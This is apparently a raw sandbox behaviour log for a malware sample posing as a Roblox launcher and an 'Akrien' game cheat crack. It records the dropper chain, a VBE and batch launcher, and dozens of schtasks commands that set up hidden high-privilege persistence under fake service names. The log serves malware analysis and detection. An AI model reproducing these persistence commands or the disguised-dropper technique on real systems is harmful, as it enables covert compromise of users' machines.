            Source: C:\Users\user\Desktop\RFAwChXSve.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: RFAwChXSve.exeReversingLabs: Detection: 84%
            Source: RFAwChXSve.exeVirustotal: Detection: 93%
            Source: unknownProcess created: C:\Users\user\Desktop\RFAwChXSve.exe "C:\Users\user\Desktop\RFAwChXSve.exe"
            Source: C:\Users\user\Desktop\RFAwChXSve.exeProcess created: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe "C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe"
            Source: C:\Users\user\Desktop\RFAwChXSve.exeProcess created: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe "C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe"
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeProcess created: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe --crashpad --no-rate-limit --database=C:\Users\user\AppData\Local\Temp\crashpad_roblox --metrics-dir=C:\Users\user\AppData\Local\Temp\crashpad_roblox --url=https://uploads.backtrace.rbx.com/post --annotation=RobloxChannel=production --annotation=RobloxGitHash=cd8f60aa5fd1b833d79957e664b9bd42f71216a2 --annotation=UploadAttachmentKiloByteLimit=100 --annotation=UploadPercentage=100 --annotation=format=minidump --annotation=token=a2440b0bfdada85f34d79b43839f2b49ea6bba474bd7d126e844bc119271a1c3 --initial-client-data=0x8b4,0x8b8,0x8bc,0x884,0x8c0,0x12c9d84,0x12c9d94,0x12c9da4
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeProcess created: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe "C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe"
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeProcess created: C:\Users\user\AppData\Local\Temp\AkrienCrack.exe "C:\Users\user\AppData\Local\Temp\AkrienCrack.exe"
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Browserfont\ilq5gxa6sOuB.vbe"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Browserfont\hryZMJ.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Browserfont\refdhcp.exe "C:\Browserfont\refdhcp.exe"
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Saved Games\RDMwYUvZPK.exe'" /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Users\Default\Saved Games\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Saved Games\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 7 /tr "'C:\Browserfont\RDMwYUvZPK.exe'" /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Browserfont\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 11 /tr "'C:\Browserfont\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 10 /tr "'C:\Users\user\Templates\RDMwYUvZPK.exe'" /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Users\user\Templates\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 11 /tr "'C:\Users\user\Templates\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 11 /tr "'C:\Users\user\RDMwYUvZPK.exe'" /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Users\user\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 10 /tr "'C:\Users\user\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 12 /tr "'C:\AkrienAntiLeak\SgrmBroker.exe'" /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SgrmBroker" /sc ONLOGON /tr "'C:\AkrienAntiLeak\SgrmBroker.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 7 /tr "'C:\AkrienAntiLeak\SgrmBroker.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Browserfont\services.exe'" /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Browserfont\services.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "servicess" /sc MINUTE /mo 7 /tr "'C:\Browserfont\services.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 5 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\RDMwYUvZPK.exe'" /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 8 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 12 /tr "'C:\Users\user\RDMwYUvZPK.exe'" /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Users\user\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 12 /tr "'C:\Users\user\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe'" /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe "C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe"
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\windows photo viewer\en-GB\RDMwYUvZPK.exe'" /f
            Source: unknownProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe "C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe"
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Program Files (x86)\windows photo viewer\en-GB\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\RFAwChXSve.exeProcess created: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe "C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe" Jump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeProcess created: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe "C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeProcess created: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe --crashpad --no-rate-limit --database=C:\Users\user\AppData\Local\Temp\crashpad_roblox --metrics-dir=C:\Users\user\AppData\Local\Temp\crashpad_roblox --url=https://uploads.backtrace.rbx.com/post --annotation=RobloxChannel=production --annotation=RobloxGitHash=cd8f60aa5fd1b833d79957e664b9bd42f71216a2 --annotation=UploadAttachmentKiloByteLimit=100 --annotation=UploadPercentage=100 --annotation=format=minidump --annotation=token=a2440b0bfdada85f34d79b43839f2b49ea6bba474bd7d126e844bc119271a1c3 --initial-client-data=0x8b4,0x8b8,0x8bc,0x884,0x8c0,0x12c9d84,0x12c9d94,0x12c9da4Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeProcess created: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe "C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeProcess created: C:\Users\user\AppData\Local\Temp\AkrienCrack.exe "C:\Users\user\AppData\Local\Temp\AkrienCrack.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Browserfont\ilq5gxa6sOuB.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Browserfont\hryZMJ.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Browserfont\refdhcp.exe "C:\Browserfont\refdhcp.exe"
            Source: C:\Browserfont\refdhcp.exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: sensapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: d3d11.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: resourcepolicyclient.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: d3d10warp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: sensapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: opengl32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: wininet.dllJump to behavior
